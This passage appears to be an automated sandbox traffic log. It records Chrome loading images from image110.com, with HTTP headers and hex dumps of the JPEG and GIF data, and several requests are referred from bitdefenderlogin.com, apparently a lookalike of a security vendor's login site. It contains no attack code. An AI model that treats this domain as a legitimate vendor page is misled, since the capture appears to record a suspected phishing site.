                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:39 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:39 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 46771
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:32 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf70-b6b3"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:39 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:39 UTC16037INData Raw: ff d8 ff e1 1a d4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 31 3a 31 38 20 32 33 3a 35 36 3a 30 36 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 4e a0 03 00 04 00 00 00 01 00 00 00 51 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00
                                                                                                                                                          Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2022:11:18 23:56:06NQ
                                                                                                                                                          2024-06-09 22:40:39 UTC16384INData Raw: 00 00 00 00 00 46 73 46 72 56 6c 4c 73 00 00 00 01 6c 6f 6e 67 4f ce 65 41 00 00 00 00 4c 43 6e 74 6c 6f 6e 67 00 00 00 00 00 00 38 42 49 4d 52 6f 6c 6c 00 00 00 08 00 00 00 00 00 00 00 00 38 42 49 4d 0f a1 00 00 00 00 00 1c 6d 66 72 69 00 00 00 02 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 38 42 49 4d 04 06 00 00 00 00 00 07 00 07 00 00 00 01 01 00 ff e1 15 ac 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22
                                                                                                                                                          Data Ascii: FsFrVlLslongOeALCntlong8BIMRoll8BIMmfri8BIMhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="
                                                                                                                                                          2024-06-09 22:40:39 UTC14350INData Raw: 14 99 b0 f9 f3 3f 5e f3 0e 54 ae 9a 06 05 4a 4a f8 66 27 59 02 b8 37 5f 30 9e 26 bf b5 43 c9 6d 2b fb 75 82 47 4e 90 54 3d e0 1f 4a d0 51 04 c7 45 1d ec b7 e9 03 d2 a7 e1 9d d7 2f c2 73 ab de 9d f3 9e 18 98 9e 27 99 e3 fc 39 fd 6d 7f 55 71 3f 9a 87 35 63 f9 af 2d 56 d5 53 d5 62 91 47 33 ac 35 14 b8 d5 11 90 a9 00 80 d0 a1 f7 63 41 c8 47 36 b3 fe 79 69 76 c5 d1 d6 93 fb 54 4f f0 69 20 1d 3d 5a 4c 7b 4f 13 46 ac 3a eb 0b 4a 90 20 ec f3 a0 07 39 fa 34 f4 f7 eb 93 d3 3f e2 b3 eb 0f ab d9 97 0e 7f 54 9d 5b ea 07 53 30 ff 00 44 78 de 2f 89 a4 38 86 13 97 7a 26 b5 6f 82 61 d8 44 72 30 2b 25 64 78 15 5c 75 86 30 77 42 37 80 a5 0b 70 c7 2a 40 ca 5c b3 b6 b7 56 96 1b 48 d6 91 b1 45 cf b8 ab a7 ee 04 4e c3 4d be b7 1e 2a 5a 84 93 c7 cb a2 aa bb d1 e5 4e 28 fe b9 f0
                                                                                                                                                          Data Ascii: ?^TJJf'Y7_0&Cm+uGNT=JQE/s'9mUq?5c-VSbG35cAG6yivTOi =ZL{OF:J 94?T[S0Dx/8z&oaDr0+%dx\u0wB7p*@\VHENM*ZN(


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          51192.168.2.549773103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC384OUTGET /uploads/af5479f61b9c648fdb65957b6b3a813b.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:39 UTC345INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:39 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 7889
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:14 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf9a-1ed1"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:39 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:39 UTC7889INData Raw: 47 49 46 38 39 61 4d 01 51 00 f7 00 00 fd cf c9 c5 8e 0c b2 a3 5b ff 8d 7d 21 21 21 fe f5 f4 f9 d3 29 76 63 3b 11 19 28 b4 ac 9f 4f 2d 0f 91 63 15 f9 cc 88 87 77 46 fd f6 86 a5 79 2b ef c9 4e 73 42 11 26 26 26 b9 88 13 a4 00 00 66 39 0d 15 15 15 fe f9 0f aa 95 6c ee b2 77 65 62 41 a9 9b 57 d9 d5 77 7a 75 4a db a5 0a 28 28 28 94 8e 55 e5 b2 11 59 55 3b fb e8 4c e9 b8 57 eb b8 31 ab 73 1c 8b 87 53 4d 4d 4b 68 59 35 34 16 0b ff ff a7 b6 98 4f 97 8f 77 c7 77 0c c3 b6 8f c7 a9 53 37 26 17 db b8 56 ff fb b7 1a 1a 1a 37 34 2c 9b 96 5a fe ea e8 45 37 25 93 75 35 47 44 33 d4 c6 8f d1 cc b1 fe fe 93 fd ed 31 b7 b2 66 cb 95 1f de b2 46 9b 81 35 bf b8 68 1c 1c 1c c8 9c 34 8a 59 26 fd e5 75 88 59 18 fd fc c7 1a 20 28 da aa 28 f7 e4 a7 ea c8 17 98 84 4b a5 8a 4b 1e 1e
                                                                                                                                                          Data Ascii: GIF89aMQ[}!!!)vc;(O-cwFy+NsB&&&f9lwebAWwzuJ(((UYU;LW1sSMMKhY54OwwS7&V74,ZE7%u5GD31fF5h4Y&uY ((KK


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          52192.168.2.549774103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC627OUTGET /uploads/280b7428c4c993b756a8e010d0e12815.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:39 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:39 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 26012
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:36 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf74-659c"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:39 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:39 UTC16037INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 78 00 78 00 00 ff e1 00 58 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 31 00 02 00 00 00 11 00 00 00 3e 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 00 00 51 12 00 04 00 00 00 01 00 00 00 00 00 00 00 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 30
                                                                                                                                                          Data Ascii: JFIFxxXExifMM*1>QQQAdobe ImageReadyCC0
                                                                                                                                                          2024-06-09 22:40:39 UTC9975INData Raw: d9 91 86 27 9e 40 ac 66 fd 86 e3 f1 67 ed 33 f1 93 c4 be 2a 3a 4e ad e0 df 8a 7a 1d 86 91 fd 9c 37 fd a6 2f 22 15 47 66 ca 85 52 19 03 23 2b 16 52 01 e0 80 6b 5a 98 4c 4b a6 95 2f 76 5e d2 4d 3d 34 4f 9a cf d1 dd 7d e4 43 11 49 4d b9 ea b9 22 bf f4 9b af c0 f9 e7 e2 f7 ec ef ae 7e cd 7f f0 44 ef 1f e8 fe 23 36 50 eb 3a c5 e4 5a dd c5 8d 94 82 4b 5d 2b ed 1a 9d a1 5b 68 98 12 a5 51 42 e7 6e 57 73 36 0b 0c 31 f6 ef d9 6b c7 3f b4 76 a1 73 e0 db 4f 14 78 1f e1 ed 87 82 1a ce 15 b8 be b3 d5 24 92 f5 20 10 7e ed 95 0b 10 58 90 99 18 ee 7a 56 2e a1 fb 0c fc 4a d6 ff 00 e0 9f 9e 2e f8 1f aa 78 ab c3 fa c4 82 68 6d 7c 2d ac 4e f3 ab ae 9d 15 d4 33 45 15 da f9 67 6b a2 c4 54 6c 2e 00 2a bd 13 27 a9 f8 21 e0 8f da 73 c2 3e 21 f0 dd 8f 8a 35 df 83 57 1e 11 d3 44 56
                                                                                                                                                          Data Ascii: '@fg3*:Nz7/"GfR#+RkZLK/v^M=4O}CIM"~D#6P:ZK]+[hQBnWs61k?vsOx$ ~XzV.J.xhm|-N3EgkTl.*'!s>!5WDV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          53192.168.2.549776103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC384OUTGET /uploads/5bcd8d72c7e04fed54071b9ad48ce4b9.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:39 UTC345INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:39 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 6877
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:55 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf4b-1add"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:39 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:39 UTC6877INData Raw: 47 49 46 38 39 61 4e 01 51 00 f7 00 00 6a ad de 8c 52 0b a5 94 34 e4 d6 6b 6c 52 41 cd 69 9b 45 25 10 9b 88 38 c8 8b 44 d6 c7 57 ae 6e 08 d6 cc 6e 89 7a 52 95 87 4d cc 87 bf f5 f5 c8 a6 9b 68 69 54 39 eb 61 00 4e 31 1c ad 6a 44 c5 be 92 5d 41 2e 60 45 33 87 73 64 79 64 2c f5 e2 a0 dc 87 00 f9 db c6 50 32 1e f5 b4 6a 67 47 16 ff ff ff 8b 9f d5 55 39 25 59 3e 28 65 3a 0f e6 ac 54 b0 82 11 de f5 f5 4d 2f 1a 6a 53 25 76 64 4c a5 97 4d 74 57 16 48 2a 15 cc b6 30 52 34 20 f5 e7 78 85 74 36 5e 43 30 cc 33 00 ce ac a0 f5 f5 bf 43 24 0e 7c 6b 52 62 48 35 65 4d 2b 9a 8c 78 d7 e2 f5 ed b1 87 64 4a 38 8b c8 cc da ca 83 66 4c 39 b4 9e 2e 69 4f 3e 70 5a 29 8a 78 2e d3 8f 0a d6 69 00 85 66 1a d0 88 8a bb aa 47 c3 6c 08 a5 9a 87 f6 eb 90 b3 a8 5c e8 7a 2b 46 27 12 f6 e0
                                                                                                                                                          Data Ascii: GIF89aNQjR4klRAiE%8DWnnzRMhiT9aN1jD]A.`E3sdyd,P2jgGU9%Y>(e:TM/jS%vdLMtWH*0R4 xt6^C03C$|kRbH5eM+xdJ8fL9.iO>pZ)x.ifGl\z+F'


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          54192.168.2.549778103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC627OUTGET /uploads/c0c87060c0d0344dc06ac6961604f1dd.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:40 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:40 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 24478
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:25 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfa5-5f9e"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:40 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:40 UTC16037INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 78 00 78 00 00 ff e1 00 58 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 31 00 02 00 00 00 11 00 00 00 3e 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 00 00 51 12 00 04 00 00 00 01 00 00 00 00 00 00 00 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 30
                                                                                                                                                          Data Ascii: JFIFxxXExifMM*1>QQQAdobe ImageReadyCC0
                                                                                                                                                          2024-06-09 22:40:40 UTC8441INData Raw: a7 cc bb d4 64 69 ae 1f d4 97 c8 0b ff 00 01 0a 2b e6 af f8 24 6f c7 7f 1a ea 9e 3a 9b c0 f3 35 ce a9 e0 fb 4b 19 2e 14 ca a5 86 92 e1 86 d0 af d9 5c 92 36 1e fc 8c 61 b3 e9 7f f0 58 3f 89 d3 78 57 e0 5e 8d a0 d9 ea 4f 69 75 e2 0d 4b 33 c1 13 95 7b 8b 68 91 8b 03 8f e0 f3 1a 2c 8e e7 1e 95 c9 1c 6e 0a b6 0e 59 a4 e9 27 24 ac ee 96 eb 4b 5d f4 f3 ff 00 86 36 78 7c 45 3c 42 c1 46 a3 b5 fa 32 d7 85 ff 00 66 5b 6f d8 c3 f6 a5 f0 df 88 bc 21 71 74 3c 0b e3 89 5b 43 d4 6c 5e 53 28 b2 9e 45 67 b7 65 63 cb 23 48 80 02 d9 2a 58 8c 90 d8 af ac 2b e1 0f f8 24 55 de ad f1 0f c1 5e 2d d0 75 4b 8b ab 8f 0f e8 b7 da 7d fd 81 91 8b 0b 5b 95 91 a4 2a 99 e8 0f 94 84 81 c0 eb dc e7 ee fa ef c8 65 09 e1 bd ad 18 f2 c6 4e e9 76 7b 34 bc ae ae bd 4e 6c ce 32 8d 6f 67 51 de 51
                                                                                                                                                          Data Ascii: di+$o:5K.\6aX?xW^OiuK3{h,nY'$K]6x|E<BF2f[o!qt<[Cl^S(Egec#H*X+$U^-uK}[*eNv{4Nl2ogQQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          55192.168.2.549777103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC627OUTGET /uploads/e64e3b88ee0477d975ecd1b4e3ba5d63.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:40 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:40 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 223398
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:46 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfba-368a6"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:40 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:40 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 ef 9e 11 ac d6 c7 5b 26 12 d6 e7 de 4e 4b 48 ff ee 72 ff f7 b3 ff 6d 6d ff 95 96 ff d8 d8 6c 63 f7 ff e7 4c b9 b9 b9 d9 b4 e2 dd 69 15 ff f0 91 66 45 2b fd 44 42 94 1c 0e ff de 25 2a 9c 78 f1 d0 b3 39 21 e8 93 c8 b5 d5 d5 fb 87 87 87 9b 99 fc 10 00 ff ee ee ee b7 b5 f8 ff de 18 ff ff ec 07 15 99 4b 36 ed dc ef e8 fe 22 23 d1 af 92 47 a8 84 65 58 a7 6b 6b 6b a5 ce bc ff fe d9 d7 c8 b3 8f 6d 4e f6 08 05 ff f8 ca ed f7 ef ad ad ad 03 5a da f8 d4 92 af 8d 71 ff e7 37 b5 91 4d 39 39 39 ce b8 ac d4 ae 70 f3 d0 6f b0 97 8b 73 b5 9c c7 c6 c6 16 12 6a 90 76 6b e6 dc fb 84 bd a5 b5 a7 94 d2 ab 4b f2 b5 8b ff ef ee 6c 55 46 bd de ce 7d c6 ae ed b2 6f ce 95 48 b0 72 4f 87 4f 2f 8c 68 33 d0 90 6b 85 75 f0 53 a3 4f d6 91 8a cf 6e
                                                                                                                                                          Data Ascii: GIF89ad[&NKHrmmlcLifE+DB%*x9!K6"#GeXkkkmNZq7M999posjvkKlUF}oHrOO/h3kuSOn
                                                                                                                                                          2024-06-09 22:40:40 UTC16384INData Raw: 27 c5 d2 35 45 b2 1e 8a ce 33 ad 52 0e eb 88 fe c0 67 7c 10 15 7c c6 89 0e 1f 0a 47 e3 31 4d 60 45 14 98 66 19 ac f3 1c e1 c9 83 c0 c2 ec 2c 0f c2 20 80 49 1c 00 02 1c 19 41 80 c1 15 9c 35 59 d3 4c 26 d9 6e fb 50 b3 47 c7 aa 38 e3 72 56 44 04 21 99 5d f9 50 15 9c a0 09 33 f9 9e 14 d5 e4 40 60 d2 59 5f 81 2f 09 76 60 23 80 4f 16 b6 36 7b 95 59 83 81 36 77 84 05 ad 05 8a 7e 51 56 54 03 56 c1 c2 0b c0 41 44 b8 40 9c 08 b5 64 59 ff 9f 05 9a 11 75 0e 85 d4 40 e2 8b 44 76 d7 e0 44 7a d9 c4 65 53 e8 66 53 2a c6 9e d6 79 60 8b 35 66 94 4b d7 36 41 7c 00 6e b3 ac 28 b3 ec da da b6 6f ff f6 29 77 25 03 f5 66 e3 00 ee 4b 0e 85 15 ca 34 f3 89 87 b9 bd c9 0b 58 f0 4f f9 2d 1f bc 72 d7 c8 82 53 1d 43 03 05 64 3f f0 41 65 75 77 51 99 b6 21 56 ae 2b fb d7 67 c3 91 e1 f6
                                                                                                                                                          Data Ascii: '5E3Rg||G1M`Ef, IA5YL&nPG8rVD!]P3@`Y_/v`#O6{Y6w~QVTVAD@dYu@DvDzeSfS*y`5fK6A|n(o)w%fK4XO-rSCd?AeuwQ!V+g
                                                                                                                                                          2024-06-09 22:40:40 UTC16384INData Raw: 95 20 cb 34 78 fb 3a 8c 10 01 aa ba 68 41 a3 4a 10 db 00 72 a0 25 50 77 33 b6 7d ac c3 10 fc 0f 2b ff 6c 10 b0 20 bc 5c fb 36 2d a5 8d a5 55 84 5c 02 b1 3a dc 8d 3f 17 20 51 a0 c9 9c 4c 51 b1 b0 c9 eb 01 ca 9b ac c9 3b 76 93 e6 f2 57 c7 7b 12 20 4b c4 4f 71 b2 53 b1 be a8 42 01 55 5c 56 a9 92 c8 03 a1 4c 6b c9 81 a0 92 ab 4d bc 3e df d4 4d a9 72 01 44 cb 4d c2 23 02 89 c6 88 bf a2 ad 22 9a 79 62 f9 76 13 f9 77 04 f1 7f 5e 00 cb 2f 82 6e 05 c1 55 b2 39 78 f5 84 5f 86 66 c5 12 4c 23 43 a2 7f e7 54 55 15 79 b5 1a 0b 11 3c 47 63 20 ac 48 0f 65 8d 70 62 b0 01 3b 27 01 93 b0 57 02 72 2d 26 1f e5 41 92 93 3c 10 2f ec 26 1e 6c 25 ed f0 af 7f 7c 10 b0 da ab 5c 2b 11 a1 04 b8 0d 91 d0 2a b1 ca ac 7c 14 47 0c a1 a9 f2 43 12 b1 3b 8d db 79 b1 ec 10 ba 3c 43 92 ab 9b
                                                                                                                                                          Data Ascii: 4x:hAJr%Pw3}+l \6-U\:? QLQ;vW{ KOqSBU\VLkM>MrDM#"ybvw^/nU9x_fL#CTUy<Gc Hepb;'Wr-&A</&l%|\+*|GC;y<C
                                                                                                                                                          2024-06-09 22:40:40 UTC16384INData Raw: b6 b9 c1 14 ac c3 15 63 20 bd da 99 e4 04 9a 81 a4 2f 6f 19 be 08 14 c2 b4 db b6 24 99 9a 4b 4a 42 c7 99 32 28 34 ce 83 63 a5 46 2c 96 45 10 ae 46 b4 8b ef 9c 21 cb 14 a7 2a 1b 21 96 43 43 b9 4c bf 33 43 b8 28 bd c2 d9 79 0b 7e 52 9c 9a b9 41 8b d0 9c ff 8a 48 a8 47 74 91 cb 1c 4e 08 22 c1 33 35 13 ae 39 09 5f 21 85 8a 78 38 0d 79 d3 2d f5 91 3d 13 25 46 bc 42 3f 7d 0c 0a e4 30 fc 39 99 0b cc 8b 0d 24 ad 05 58 cd 0e 9c 80 05 28 80 05 88 d4 93 fc d0 e1 48 11 86 0c 22 d5 19 9b 74 40 be 7f 80 ce 2d 69 19 4d 91 8a 3a 7d af 63 34 47 8e f8 01 55 f3 a5 5b 4c 10 a2 d2 12 68 b9 a1 79 e3 c1 ee 21 52 8b 68 d0 55 0a ac 38 d5 a6 9a 19 bb 52 4a 26 08 da 23 b0 c0 2e 27 b5 a5 01 69 a9 5e f3 ce ef 6c 12 5d 45 cf 3f ad c3 a8 53 c7 35 62 c7 30 3d 90 ee 79 8b 20 ad 88 d3 71
                                                                                                                                                          Data Ascii: c /o$KJB2(4cF,EF!*!CCL3C(y~RAHGtN"359_!x8y-=%FB?}09$X(H"t@-iM:}c4GU[Lhy!RhU8RJ&#.'i^l]E?S5b0=y q
